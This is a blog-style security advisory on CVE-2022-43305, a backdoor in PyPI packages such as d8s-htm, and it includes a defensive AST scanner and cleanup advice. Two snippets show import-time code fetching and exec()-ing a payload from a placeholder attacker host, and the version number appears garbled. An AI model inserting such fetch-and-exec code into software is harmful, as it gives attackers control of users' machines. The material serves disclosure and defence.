The Python Package Index (PyPI) is one of the main ways Python developers get third-party libraries to save time or add features to their projects. However, if someone with bad intentions manages to sneak harmful code into a package, anyone installing it could be at risk. This happened with several Python packages, including d8s-python and democritus-algorithms, which were compromised and shipped code-execution backdoors; for this CVE, the affected release is version .1. of d8s-htm.
In this post, we’ll break down what CVE-2022-43305 is, how the backdoor works, and show code snippets in the style of the affected packages. We'll also share the original references and give tips on protecting yourself from similar attacks.
## What Is CVE-2022-43305?
CVE-2022-43305 is a security vulnerability assigned to several packages, most notably d8s-python and its related submodules (like d8s-htm). Attackers managed to publish versions of these packages to PyPI with an embedded backdoor that could let them execute code on the machine of anyone who installed the package.
This backdoor means that if you pip install that package and import it—even unknowingly—it could let a hacker run any code they want on your system.
## How Did the Backdoor Work?
The affected packages included a small piece of code, often hidden or obfuscated, that ran automatically when the package was imported. This code would contact an outside server (controlled by the attacker), download additional code or instructions, and run them on your machine.
Here’s a simplified example of what this kind of malicious code looks like:

```python
# Example snippet (similar to what appeared in d8s-htm .1.)
import urllib.request

def malicious():
    # Contact the attacker's server and execute whatever it sends back
    url = 'http://malicious-server.com/cmd'
    exec(urllib.request.urlopen(url).read())

# Called at module level, so simply importing the package triggers it
malicious()
```
Whenever the package was installed or imported, this function would fire, contacting the attacker's server and running any code sent back. The dangerous part is that this happens without your knowledge or approval.
Sometimes the backdoor code was not immediately visible: it was hidden in places like setup.py or __init__.py, or obfuscated so that it looked like data or configuration.
## Affected Packages

The packages named in this post are:

- d8s-htm
- d8s-python
- democritus-algorithms

If you installed any of these after fall 2022, you may be at risk. You can check installed versions with:

```shell
pip show d8s-htm d8s-python democritus-algorithms
```
## Exploit Details
The exploit is what’s called a “supply chain attack.” Instead of hacking your code directly, attackers target the tools and packages everyone uses. Once the backdoor is in the package and uploaded to PyPI, anyone installing it is instantly exposed.
The final stage is execution: whatever code the attacker wants is run on your machine.
Here’s a more detailed look at the structure of such a backdoor (from a real compromised PyPI package):
```python
# In __init__.py or a helper module
try:
    import urllib.request
    payload_url = 'http://evil-domain.tld/payload'
    # Fetch the payload from the attacker's server and run it as Python code
    exec(urllib.request.urlopen(payload_url).read().decode())
except Exception as e:
    pass  # Hide errors (no network, server down) so nothing looks suspicious
```
The attacker can change the code on their server at any time! As long as someone imports the package, they have control.
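As an added example (not code from this post or from the affected packages), here is a small AST-based scanner that flags the pattern described above: an exec() or eval() whose argument is built from a network fetch, and whether it is wrapped in a try whose handler is a bare pass. The sample sources, the host example.invalid and the helper names (find_remote_exec, scan_tree, NETWORK_FETCHERS) are my own constructions.

```python
import ast
import pathlib

# Network-fetching functions (urllib.request.urlopen, requests.get/post); 'get' also matches dict.get, cheap to review.
NETWORK_FETCHERS = {"urlopen", "get", "post"}
def _contains_network_fetch(node: ast.AST) -> bool:
    """True if any call nested inside `node` invokes a known network-fetching function."""
    for sub in ast.walk(node):
        if isinstance(sub, ast.Call):
            f = sub.func
            if (f.attr if isinstance(f, ast.Attribute) else getattr(f, "id", None)) in NETWORK_FETCHERS:
                return True
    return False
def find_remote_exec(source: str, filename: str = "<module>") -> list[str]:
    """Report exec()/eval() calls fed by a network fetch; note when a bare except/pass hides failures."""
    tree = ast.parse(source, filename)
    parents = {c: p for p in ast.walk(tree) for c in ast.iter_child_nodes(p)}
    findings = []
    for node in ast.walk(tree):
        if not (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
                and node.func.id in {"exec", "eval"} and node.args
                and _contains_network_fetch(node.args[0])):
            continue
        msg = f"{filename}:{node.lineno}: {node.func.id}() of network-fetched data"
        enclosing = parents.get(node)  # climb to the nearest enclosing try, if any
        while enclosing is not None and not isinstance(enclosing, ast.Try):
            enclosing = parents.get(enclosing)
        if enclosing and any(len(h.body) == 1 and isinstance(h.body[0], ast.Pass)
                             for h in enclosing.handlers):
            msg += " (errors silenced by except/pass)"
        findings.append(msg)
    return findings
def scan_tree(root: str) -> list[str]:
    """Run find_remote_exec over every .py file under `root`, e.g. a venv's site-packages."""
    findings: list[str] = []
    for path in pathlib.Path(root).rglob("*.py"):
        try:
            findings += find_remote_exec(path.read_text(encoding="utf-8", errors="replace"), str(path))
        except SyntaxError:
            continue  # not parseable as Python 3 (e.g. vendored legacy code); skip it
    return findings
# Constructed sample in the shape the post describes (not the real package's code).
SUSPICIOUS = """
try:
    import urllib.request
    exec(urllib.request.urlopen('http://example.invalid/payload').read().decode())
except Exception:
    pass
"""
BENIGN = "import urllib.request\ndata = urllib.request.urlopen('http://example.invalid/d').read()\n"  # constructed; fetches but never executes
```

Point scan_tree at a virtual environment's site-packages directory to review every installed module. Findings are leads to inspect rather than proof of compromise, and a payload fetch hidden behind string building or base64 decoding will slip past this simple check.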
## If You Installed These Packages

Remove them:

```shell
pip uninstall d8s-htm d8s-python democritus-algorithms
```
- Check your projects and virtual environments for their presence.
- Consider rotating any credentials or secrets on systems where the packages were used.
- Stay up to date by watching security advisories on the PyPI blog and sources like GitHub Security Advisories and the Python Packaging Authority.
---
## Official References
- NIST CVE-2022-43305 Database Entry
- Sonatype Security Blog – More Malicious Packages on PyPI
- PyPI Security Disclosures
- BleepingComputer: PyPI package supply chain attacks
---
## How To Stay Safe from Similar Attacks
- Only install packages from trusted sources.
- Watch for new or unmaintained packages with few downloads.
- Check the code in any new package before using it, especially if you don’t recognize the author.
- Use security tools like Safety or Bandit to scan dependencies.
- Regularly check advisories and keep your dependencies up to date.
---
## In Summary
CVE-2022-43305 is a supply-chain vulnerability that highlights just how easily trust in software tools can be broken. The d8s-python and d8s-htm .1. packages exposed anyone installing them to remote code execution. Always stay cautious, and treat every dependency—no matter how small—as untrusted until proven safe.
If you were affected: Remove the packages, change credentials, watch your systems for suspicious activity, and keep up with security alerts. This is a reminder to always trust, but verify—especially with open-source software!
---
*Stay safe out there. If you have questions about specific packages or want to share your experience, drop a comment below.*
## Timeline
Published on: 11/07/2022 15:15:00 UTC
Last modified on: 11/08/2022 17:27:00 UTC